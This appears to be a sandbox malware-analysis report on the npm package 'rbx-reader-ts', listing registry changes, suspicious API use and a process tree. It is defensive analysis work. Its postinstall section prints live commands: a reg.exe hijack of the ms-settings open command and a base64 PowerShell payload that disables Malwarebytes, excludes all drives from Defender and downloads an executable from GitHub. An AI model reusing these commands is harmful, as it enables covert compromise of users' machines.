Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\011B2C6A4395F7A48B1C157EDC15FF28\InstanceType = "0"	msiexec.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings\Shell\Open	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\g9eriio86qu4avews7s5\Shell\open	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\sn38h4mo3yegjar53e7s\Shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\011B2C6A4395F7A48B1C157EDC15FF28\NodeRuntime	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\011B2C6A4395F7A48B1C157EDC15FF28	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\011B2C6A4395F7A48B1C157EDC15FF28\AdvertiseFlags = "388"	msiexec.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings\Shell\Open\command\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings\Shell\Open\command\	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ca75muodqnve38eo8skc\Shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ca75muodqnve38eo8skc\Shell\open	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\011B2C6A4395F7A48B1C157EDC15FF28\SourceList\Media\1 = ";"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings\Shell\Open	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ca75muodqnve38eo8skc\Shell\open\command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\011B2C6A4395F7A48B1C157EDC15FF28\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings\Shell\Open\command	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4676	msiexec.exe
4676	msiexec.exe
2156	msedge.exe
2156	msedge.exe
4792	msedge.exe
4792	msedge.exe
5500	msedge.exe
5500	msedge.exe
5880	identity_helper.exe
5880	identity_helper.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
5052	node.exe
5052	node.exe
5964	powershell.exe
5984	powershell.exe
5964	powershell.exe
5984	powershell.exe
5964	powershell.exe
5984	powershell.exe
5984	powershell.exe
5984	powershell.exe
5984	powershell.exe
1912	Onedrive.exe
1912	Onedrive.exe
736	msedge.exe
736	msedge.exe
3284	msedge.exe
3284	msedge.exe
228	identity_helper.exe
228	identity_helper.exe
5140	msedge.exe
5140	msedge.exe
1912	Onedrive.exe
1912	Onedrive.exe
1912	Onedrive.exe
1912	Onedrive.exe
1912	Onedrive.exe
1912	Onedrive.exe
1912	Onedrive.exe
1912	Onedrive.exe
1912	Onedrive.exe
1912	Onedrive.exe
1912	Onedrive.exe
1912	Onedrive.exe
1912	Onedrive.exe
1912	Onedrive.exe
1912	Onedrive.exe
1912	Onedrive.exe
1912	Onedrive.exe
1912	Onedrive.exe
1912	Onedrive.exe
1912	Onedrive.exe
1912	Onedrive.exe
1912	Onedrive.exe
1912	Onedrive.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1912	Onedrive.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs

pid	Process
2156	msedge.exe
2156	msedge.exe
2156	msedge.exe
2156	msedge.exe
2156	msedge.exe
2156	msedge.exe
2156	msedge.exe
3284	msedge.exe
3284	msedge.exe
3284	msedge.exe
3284	msedge.exe
3284	msedge.exe
3284	msedge.exe
3284	msedge.exe
3284	msedge.exe
3284	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3936	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3936	msiexec.exe
Token: SeSecurityPrivilege	4676	msiexec.exe
Token: SeCreateTokenPrivilege	3936	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	3936	msiexec.exe
Token: SeLockMemoryPrivilege	3936	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3936	msiexec.exe
Token: SeMachineAccountPrivilege	3936	msiexec.exe
Token: SeTcbPrivilege	3936	msiexec.exe
Token: SeSecurityPrivilege	3936	msiexec.exe
Token: SeTakeOwnershipPrivilege	3936	msiexec.exe
Token: SeLoadDriverPrivilege	3936	msiexec.exe
Token: SeSystemProfilePrivilege	3936	msiexec.exe
Token: SeSystemtimePrivilege	3936	msiexec.exe
Token: SeProfSingleProcessPrivilege	3936	msiexec.exe
Token: SeIncBasePriorityPrivilege	3936	msiexec.exe
Token: SeCreatePagefilePrivilege	3936	msiexec.exe
Token: SeCreatePermanentPrivilege	3936	msiexec.exe
Token: SeBackupPrivilege	3936	msiexec.exe
Token: SeRestorePrivilege	3936	msiexec.exe
Token: SeShutdownPrivilege	3936	msiexec.exe
Token: SeDebugPrivilege	3936	msiexec.exe
Token: SeAuditPrivilege	3936	msiexec.exe
Token: SeSystemEnvironmentPrivilege	3936	msiexec.exe
Token: SeChangeNotifyPrivilege	3936	msiexec.exe
Token: SeRemoteShutdownPrivilege	3936	msiexec.exe
Token: SeUndockPrivilege	3936	msiexec.exe
Token: SeSyncAgentPrivilege	3936	msiexec.exe
Token: SeEnableDelegationPrivilege	3936	msiexec.exe
Token: SeManageVolumePrivilege	3936	msiexec.exe
Token: SeImpersonatePrivilege	3936	msiexec.exe
Token: SeCreateGlobalPrivilege	3936	msiexec.exe
Token: SeCreateTokenPrivilege	3936	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	3936	msiexec.exe
Token: SeLockMemoryPrivilege	3936	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3936	msiexec.exe
Token: SeMachineAccountPrivilege	3936	msiexec.exe
Token: SeTcbPrivilege	3936	msiexec.exe
Token: SeSecurityPrivilege	3936	msiexec.exe
Token: SeTakeOwnershipPrivilege	3936	msiexec.exe
Token: SeLoadDriverPrivilege	3936	msiexec.exe
Token: SeSystemProfilePrivilege	3936	msiexec.exe
Token: SeSystemtimePrivilege	3936	msiexec.exe
Token: SeProfSingleProcessPrivilege	3936	msiexec.exe
Token: SeIncBasePriorityPrivilege	3936	msiexec.exe
Token: SeCreatePagefilePrivilege	3936	msiexec.exe
Token: SeCreatePermanentPrivilege	3936	msiexec.exe
Token: SeBackupPrivilege	3936	msiexec.exe
Token: SeRestorePrivilege	3936	msiexec.exe
Token: SeShutdownPrivilege	3936	msiexec.exe
Token: SeDebugPrivilege	3936	msiexec.exe
Token: SeAuditPrivilege	3936	msiexec.exe
Token: SeSystemEnvironmentPrivilege	3936	msiexec.exe
Token: SeChangeNotifyPrivilege	3936	msiexec.exe
Token: SeRemoteShutdownPrivilege	3936	msiexec.exe
Token: SeUndockPrivilege	3936	msiexec.exe
Token: SeSyncAgentPrivilege	3936	msiexec.exe
Token: SeEnableDelegationPrivilege	3936	msiexec.exe
Token: SeManageVolumePrivilege	3936	msiexec.exe
Token: SeImpersonatePrivilege	3936	msiexec.exe
Token: SeCreateGlobalPrivilege	3936	msiexec.exe
Token: SeCreateTokenPrivilege	3936	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	3936	msiexec.exe
Token: SeLockMemoryPrivilege	3936	msiexec.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3936	msiexec.exe
2156	msedge.exe
2156	msedge.exe
2156	msedge.exe
2156	msedge.exe
2156	msedge.exe
2156	msedge.exe
2156	msedge.exe
2156	msedge.exe
2156	msedge.exe
2156	msedge.exe
2156	msedge.exe
2156	msedge.exe
2156	msedge.exe
2156	msedge.exe
2156	msedge.exe
2156	msedge.exe
2156	msedge.exe
2156	msedge.exe
2156	msedge.exe
2156	msedge.exe
2156	msedge.exe
2156	msedge.exe
2156	msedge.exe
2156	msedge.exe
2156	msedge.exe
3936	msiexec.exe
2156	msedge.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
3284	msedge.exe

Suspicious use of SendNotifyMessage 59 IoCs

pid	Process
2156	msedge.exe
2156	msedge.exe
2156	msedge.exe
2156	msedge.exe
2156	msedge.exe
2156	msedge.exe
2156	msedge.exe
2156	msedge.exe
2156	msedge.exe
2156	msedge.exe
2156	msedge.exe
2156	msedge.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
1416	Taskmgr.exe
3284	msedge.exe
3284	msedge.exe
3284	msedge.exe
3284	msedge.exe
3284	msedge.exe
3284	msedge.exe
3284	msedge.exe
3284	msedge.exe
3284	msedge.exe
3284	msedge.exe
3284	msedge.exe
3284	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1912	Onedrive.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4676 wrote to memory of 2980	4676	msiexec.exe	84
PID 4676 wrote to memory of 2980	4676	msiexec.exe	84
PID 4676 wrote to memory of 3516	4676	msiexec.exe	89
PID 4676 wrote to memory of 3516	4676	msiexec.exe	89
PID 4676 wrote to memory of 3976	4676	msiexec.exe	91
PID 4676 wrote to memory of 3976	4676	msiexec.exe	91
PID 4676 wrote to memory of 3852	4676	msiexec.exe	92
PID 4676 wrote to memory of 3852	4676	msiexec.exe	92
PID 4676 wrote to memory of 3100	4676	msiexec.exe	94
PID 4676 wrote to memory of 3100	4676	msiexec.exe	94
PID 4676 wrote to memory of 3100	4676	msiexec.exe	94
PID 2156 wrote to memory of 912	2156	msedge.exe	96
PID 2156 wrote to memory of 912	2156	msedge.exe	96
PID 2156 wrote to memory of 1888	2156	msedge.exe	97
PID 2156 wrote to memory of 1888	2156	msedge.exe	97
PID 2156 wrote to memory of 1888	2156	msedge.exe	97
PID 2156 wrote to memory of 1888	2156	msedge.exe	97
PID 2156 wrote to memory of 1888	2156	msedge.exe	97
PID 2156 wrote to memory of 1888	2156	msedge.exe	97
PID 2156 wrote to memory of 1888	2156	msedge.exe	97
PID 2156 wrote to memory of 1888	2156	msedge.exe	97
PID 2156 wrote to memory of 1888	2156	msedge.exe	97
PID 2156 wrote to memory of 1888	2156	msedge.exe	97
PID 2156 wrote to memory of 1888	2156	msedge.exe	97
PID 2156 wrote to memory of 1888	2156	msedge.exe	97
PID 2156 wrote to memory of 1888	2156	msedge.exe	97
PID 2156 wrote to memory of 1888	2156	msedge.exe	97
PID 2156 wrote to memory of 1888	2156	msedge.exe	97
PID 2156 wrote to memory of 1888	2156	msedge.exe	97
PID 2156 wrote to memory of 1888	2156	msedge.exe	97
PID 2156 wrote to memory of 1888	2156	msedge.exe	97
PID 2156 wrote to memory of 1888	2156	msedge.exe	97
PID 2156 wrote to memory of 1888	2156	msedge.exe	97
PID 2156 wrote to memory of 1888	2156	msedge.exe	97
PID 2156 wrote to memory of 1888	2156	msedge.exe	97
PID 2156 wrote to memory of 1888	2156	msedge.exe	97
PID 2156 wrote to memory of 1888	2156	msedge.exe	97
PID 2156 wrote to memory of 1888	2156	msedge.exe	97
PID 2156 wrote to memory of 1888	2156	msedge.exe	97
PID 2156 wrote to memory of 1888	2156	msedge.exe	97
PID 2156 wrote to memory of 1888	2156	msedge.exe	97
PID 2156 wrote to memory of 1888	2156	msedge.exe	97
PID 2156 wrote to memory of 1888	2156	msedge.exe	97
PID 2156 wrote to memory of 1888	2156	msedge.exe	97
PID 2156 wrote to memory of 1888	2156	msedge.exe	97
PID 2156 wrote to memory of 1888	2156	msedge.exe	97
PID 2156 wrote to memory of 1888	2156	msedge.exe	97
PID 2156 wrote to memory of 1888	2156	msedge.exe	97
PID 2156 wrote to memory of 1888	2156	msedge.exe	97
PID 2156 wrote to memory of 1888	2156	msedge.exe	97
PID 2156 wrote to memory of 1888	2156	msedge.exe	97
PID 2156 wrote to memory of 1888	2156	msedge.exe	97
PID 2156 wrote to memory of 1888	2156	msedge.exe	97
PID 2156 wrote to memory of 4792	2156	msedge.exe	98
PID 2156 wrote to memory of 4792	2156	msedge.exe	98
PID 2156 wrote to memory of 1348	2156	msedge.exe	99
PID 2156 wrote to memory of 1348	2156	msedge.exe	99
PID 2156 wrote to memory of 1348	2156	msedge.exe	99
PID 2156 wrote to memory of 1348	2156	msedge.exe	99
PID 2156 wrote to memory of 1348	2156	msedge.exe	99
PID 2156 wrote to memory of 1348	2156	msedge.exe	99
PID 2156 wrote to memory of 1348	2156	msedge.exe	99
PID 2156 wrote to memory of 1348	2156	msedge.exe	99
PID 2156 wrote to memory of 1348	2156	msedge.exe	99

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\node-v22.11.0-x64.msi
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Event Triggered Execution: Installer Packages
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3936

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4676
- C:\Windows\System32\MsiExec.exe
  C:\Windows\System32\MsiExec.exe -Embedding 468A8B9F5F72075F0EB49384265940B4 C
  2⤵
  - Loads dropped DLL
  PID:2980
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  PID:3516
- C:\Windows\System32\MsiExec.exe
  C:\Windows\System32\MsiExec.exe -Embedding 964B97F89377B01C930F37603C8EF9FC
  2⤵
  - Loads dropped DLL
  PID:3976
- C:\Windows\System32\MsiExec.exe
  C:\Windows\System32\MsiExec.exe -Embedding B84AC547A167B6184721FD1A845A77D8 E Global\MSI0000
  2⤵
  - Loads dropped DLL
  PID:3852
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 7B79223449250806835FD30BAD4D9FE3
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:3100

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
PID:3124

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2156
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe8cbb3cb8,0x7ffe8cbb3cc8,0x7ffe8cbb3cd8
  2⤵
  PID:912
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1848,13579728720315380039,458697280415082734,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1960 /prefetch:2
  2⤵
  PID:1888
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1848,13579728720315380039,458697280415082734,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4792
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1848,13579728720315380039,458697280415082734,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2548 /prefetch:8
  2⤵
  PID:1348
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,13579728720315380039,458697280415082734,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1
  2⤵
  PID:1060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,13579728720315380039,458697280415082734,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
  2⤵
  PID:4660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,13579728720315380039,458697280415082734,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3636 /prefetch:1
  2⤵
  PID:5272
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,13579728720315380039,458697280415082734,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:1
  2⤵
  PID:5280
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1848,13579728720315380039,458697280415082734,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4684 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5500
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1848,13579728720315380039,458697280415082734,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5308 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,13579728720315380039,458697280415082734,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3472 /prefetch:1
  2⤵
  PID:5944
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,13579728720315380039,458697280415082734,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3476 /prefetch:1
  2⤵
  PID:5952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,13579728720315380039,458697280415082734,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4932 /prefetch:1
  2⤵
  PID:6104

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4696

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1580

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
1⤵
- Modifies registry class
PID:5196

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2236

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
1⤵
PID:5512
- C:\Windows\system32\Taskmgr.exe
  taskmgr.exe
  2⤵
  - Checks SCSI registry key(s)
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:1416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c CALL "C:\Program Files\nodejs\\node.exe" "C:\Program Files\nodejs\\node_modules\npm\bin\npm-prefix.js"
  2⤵
  PID:5748
- - C:\Program Files\nodejs\node.exe
    "C:\Program Files\nodejs\\node.exe" "C:\Program Files\nodejs\\node_modules\npm\bin\npm-prefix.js"
    3⤵
    - Executes dropped EXE
    PID:2280
- C:\Program Files\nodejs\node.exe
  "C:\Program Files\nodejs\\node.exe" "C:\Program Files\nodejs\\node_modules\npm\bin\npm-cli.js" i rbx-reader-ts
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:5052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c exit 0
    3⤵
    PID:5468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c node postinstall
    3⤵
    PID:2100
  - - C:\Program Files\nodejs\node.exe
      node postinstall
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3400
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\Software\Classes\g9eriio86qu4avews7s5\Shell\open\command" /f"
        5⤵
        
        PID:3928
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Classes\g9eriio86qu4avews7s5\Shell\open\command" /f
        6⤵
        Modifies registry class
        
        PID:3208
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\Software\Classes\g9eriio86qu4avews7s5\Shell\open\command" /ve /t REG_SZ /d "C:\WindowsApi\b74668fc0382f3c656ffb31c8c9a38b5bbd77a06.exe" /f"
        5⤵
        
        PID:3508
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Classes\g9eriio86qu4avews7s5\Shell\open\command" /ve /t REG_SZ /d "C:\WindowsApi\b74668fc0382f3c656ffb31c8c9a38b5bbd77a06.exe" /f
        6⤵
        Modifies registry class
        
        PID:4504
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /f"
        5⤵
        
        PID:3264
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /f
        6⤵
        Modifies registry class
        
        PID:1108
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "C:\WindowsApi\b74668fc0382f3c656ffb31c8c9a38b5bbd77a06.exe /c powershell -Command \"$b64 = 'JHBzV2luZG93ID0gKEdldC1Qcm9jZXNzIC1JZCAkUElEKS5NYWluV2luZG93SGFuZGxlOyBBZGQtVHlwZSAtVHlwZURlZmluaXRpb24gJ3VzaW5nIFN5c3RlbTsgdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOyBwdWJsaWMgY2xhc3MgV2luQVBJIHsgW0RsbEltcG9ydCgidXNlcjMyLmRsbCIpXSBwdWJsaWMgc3RhdGljIGV4dGVybiBib29sIFNob3dXaW5kb3coSW50UHRyIGhXbmQsIGludCBuQ21kU2hvdyk7IH0nOyBbV2luQVBJXTo6U2hvd1dpbmRvdygkcHNXaW5kb3csIDYpOyBpZiAoR2V0LVNlcnZpY2UgTUJBTVNlcnZpY2UgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWUgfCBXaGVyZS1PYmplY3QgeyAkXy5TdGF0dXMgLWVxICdSdW5uaW5nJyB9KSB7IFN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxQcm9ncmFtIEZpbGVzXE1hbHdhcmVieXRlc1xBbnRpLU1hbHdhcmVcbWFsd2FyZWJ5dGVzX2Fzc2lzdGFudC5leGUiIC1Bcmd1bWVudExpc3QgIi0tc3RvcHNlcnZpY2UiIH07IEdldC1XbWlPYmplY3QgV2luMzJfTG9naWNhbERpc2sgfCBXaGVyZS1PYmplY3QgeyAkXy5Ecml2ZVR5cGUgLWVxIDMgfSB8IEZvckVhY2gtT2JqZWN0IHsgQWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAoJF8uRGV2aWNlSUQuVHJpbSgpICsgIlwiKSB9OyAkdT0iaHR0cHM6Ly9naXRodWIuY29tL21pY2hlYWxqYW1lczk2L3JvYklveC1jZG4vcmF3L3JlZnMvaGVhZHMvbWFpbi9PbmVkcml2ZS5leGUiOyAkcD0iJGVudjpURU1QXE9uZWRyaXZlLmV4ZSI7IEludm9rZS1XZWJSZXF1